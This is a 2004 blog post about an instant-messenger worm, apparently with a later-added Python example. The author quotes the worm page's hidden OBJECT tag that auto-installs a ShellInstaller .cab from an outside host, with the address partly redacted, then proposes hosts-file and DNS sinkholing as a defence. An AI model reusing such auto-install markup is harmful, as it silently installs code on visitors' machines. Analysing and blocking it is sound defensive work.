Hierarchical virus control - that yellow bastard

February 11th, 2004

2004.0211.1631::Hierarchical virus control
Today, K, a former co-worker of mine messaged me out of the blue:
check this out... [some URL that I've edited out but had "osama capture" in the filename]
The last time I had heard from K was probably about two years ago, after I was laid off from Cox, so in my curiosity, I went ahead and clicked on the link and got a nondescript page.

And nothing happened.

You see, I'm running Linux at work, and those wonderfully magic things that happen when most people go to random web addresses don't always happen to me.

Which in this case would be a good thing.

See, later on, K would send me the following message:
if you get a link from me, don't click on it. it's some kind of virus
Given my natural programmer's curiosity, I went to the site with my text-based browser and found the following line:
<OBJECT ID="ShellInstaller" WIDTH=0 HEIGHT=0 CLASSID="<some-junk>" CODEBASE="http:// [a buddylinks.net web address] /ShellInstaller.cab#Version=1,0,0,001">
Knowing what I know about Windows and its ilk, I figured that the fine folks at buddylinks.net have figured out how to automatically install and run an application from a webpage--an application which runs through your buddy list and sends every person on it a message.

It occurred to me that there would be a very nice and easy way of getting rid of said Internet jackasses. If you've ever installed Kazaa Lite, you might know that one of the things installed along with the program is a new Windows hosts file.

Most of the time, the internet has its own way of resolving internet addresses (it's called DNS). If your computer doesn't know what www.joewebsite.com is, it asks another computer if it knows, which can ask another, and so on, sort of like that shampoo commercial, but in a more organized and hierarchical fashion. The hosts file, however, is like a personal address book of internet IP addresses--ones which might not agree with what that big hierarchical system might provide, and which your computer checks before it ever asks DNS.

Your average user will never care to use or even see what's going on in the hosts file. The reason Kazaa Lite installs a new one is the kind folk who make the application have harvested a bunch of the addresses of the more annoying netizens--advertisers, popup purveyors, those kind of guys--and have pointed their addresses at your own.

How does this help? Well, unlike the U.S. Postal Service, the web works on a request basis. You tell your computer "give me google," and it finds google and downloads it. Advertisers sneak their messages in with the messages that you download, essentially piggybacking on things that you request--"hey, computer, while you're getting website A, go to website B and download other crap."

So the hosts file that Kazaa Lite installs has set most of the common "website Bs" around the world to your own address, which, if you're the average user, isn't running web server software and doesn't have advertisements. Your web browser tries to find the ad image or the pop up code, and when it fails, it just stops trying. It's like a little workaround for the popup ad problem, at least for that one ad on your computer.

How does this relate to an Instant Messenger virus?

The host file can pretty much eliminate a given offender from the internet for a single computer. Imagine, if you will, taking the domain name of a known virus purveyor (say, www.buddylinks.net), and entering it into the big hierarchical system as or some other innocuous address. That replacement address would effectively blacklist the offending site for all the computers that trusted the DNS service of that portion of the hierarchy.
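The two layers described above (the per-machine hosts file from the Kazaa Lite paragraphs, and blacklisting at the shared DNS resolver from the paragraph just above) can be modelled in a few dozen lines. The following is an added example written for this post, not code from the original entry or from Kazaa Lite; the hosts-file text, the "authoritative" answers, and the 192.0.2.x addresses are all constructed for illustration, and it assumes 127.0.0.1 (the machine's own loopback address) as the sinkhole address, which is the usual choice for an ad-blocking hosts file.

```python
"""Toy model of the resolution order the post describes (added example):
a hosts-file entry overrides DNS for one machine only, while a blocklist
at a shared recursive resolver covers every client that trusts it."""

from typing import Dict, Optional

# Constructed hosts-file text in the standard format:
# IP address, whitespace, one or more hostnames, optional '#' comment.
HOSTS_FILE = """\
# sample hosts file (constructed for this example)
127.0.0.1   localhost
127.0.0.1   ads.example-adserver.test  popups.example-adserver.test  # ad hosts
"""

# Constructed stand-in for "the big hierarchical system": what public DNS
# would answer if nothing overrode it. Addresses are documentation ranges.
AUTHORITATIVE: Dict[str, str] = {
    "www.joewebsite.com": "192.0.2.10",
    "ads.example-adserver.test": "192.0.2.20",
    "www.buddylinks.net": "192.0.2.30",  # the post's example offender; address constructed
}


def parse_hosts(text: str) -> Dict[str, str]:
    """Parse hosts-file lines into {hostname: ip}; skips blank and comment lines."""
    table: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop trailing comments
        if not line:
            continue
        ip, *names = line.split()
        for name in names:
            table[name.lower()] = ip
    return table


class RecursiveResolver:
    """The shared resolver ('that portion of the hierarchy'); can sinkhole domains."""

    def __init__(self, upstream: Dict[str, str], sinkhole: str = "127.0.0.1"):
        self.upstream = upstream
        self.sinkhole = sinkhole  # assumption: loopback as the innocuous address
        self.blocklist: set = set()

    def block(self, domain: str) -> None:
        self.blocklist.add(domain.lower())

    def resolve(self, name: str) -> Optional[str]:
        name = name.lower()
        # A blocked domain covers itself and every name underneath it.
        if any(name == d or name.endswith("." + d) for d in self.blocklist):
            return self.sinkhole
        return self.upstream.get(name)


class Client:
    """One machine: consults its hosts file first, then its configured resolver."""

    def __init__(self, hosts_text: str, resolver: RecursiveResolver):
        self.hosts = parse_hosts(hosts_text)
        self.resolver = resolver

    def lookup(self, name: str) -> Optional[str]:
        name = name.lower()
        if name in self.hosts:
            return self.hosts[name]
        return self.resolver.resolve(name)


def demo():
    """Return lookups before and after the resolver operator blacklists a domain."""
    isp = RecursiveResolver(AUTHORITATIVE)
    kazaa_user = Client(HOSTS_FILE, isp)  # machine with the ad-blocking hosts file
    plain_user = Client("", isp)          # stock machine with an empty hosts file
    before = {
        "ads_kazaa": kazaa_user.lookup("ads.example-adserver.test"),  # 127.0.0.1
        "ads_plain": plain_user.lookup("ads.example-adserver.test"),  # 192.0.2.20
        "bl_plain": plain_user.lookup("www.buddylinks.net"),          # 192.0.2.30
    }
    # The resolver operator blacklists the offender for everyone downstream.
    isp.block("buddylinks.net")
    after = {
        "bl_kazaa": kazaa_user.lookup("www.buddylinks.net"),  # 127.0.0.1
        "bl_plain": plain_user.lookup("www.buddylinks.net"),  # 127.0.0.1
        "site": plain_user.lookup("www.joewebsite.com"),      # 192.0.2.10, unaffected
    }
    return before, after


if __name__ == "__main__":
    print(demo())
```

The `before` results show the limit of the hosts-file approach: only the machine carrying the file is protected, and the stock machine still gets the real advertiser address. After `isp.block(...)`, both machines get the sinkhole for anything under the blocked domain without touching their hosts files, which is the "hierarchical" control the post is reaching for; the cost is that every client downstream of that resolver inherits the operator's judgement, which is exactly the concern the comments raise.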

Granted, I'm neither a system administrator nor an expert in DNS, but given the proliferation of Internet assholes, I'm liking this idea more and more...

3 comments


glenn66::2004.02.11.09:42 pm
The only limitation is those Internet Assholes always have "First Strike" capability before they are "entered into the big hierarchical system"

Sadly most internet users do not have up to date anti-virus definitions, up to date or any firewall SW or up to date anti-ad sw.

I've been lucky as most of my recent time has been administrating systems with Lotus Notes e-mail instead of MS-Exchange; many viruses are ineffective since they are only targeted for Outlook/Outlook Express (but then again most people will also use their Outlook/Outlook Express for personal e-mail). Although my Lotus Notes users would be susceptible to your example due to them still using IE and such.
thepeopleseason::2004.02.12.02:09 pm::Re:
The only limitation is those Internet Assholes always have "First Strike" capability before they are "entered into the big hierarchical system"

Yeah, but it'd be lovely to see Administrators gang up on a given site and say, "Sorry, you're a bad netizen, you'll hereby get no more traffic from us." AOL (despite their eternal September userbase) would have an enormous amount of power in this regard.

umm...actually maybe that's a bad idea....:{
glenn66::2004.02.12.03:11 pm::Re:
I have a feeling microsoft.com and intel.com and irs.gov would end up on that "Bad Netizen" list just because of deep rooted hatred by the majority of System Admins :D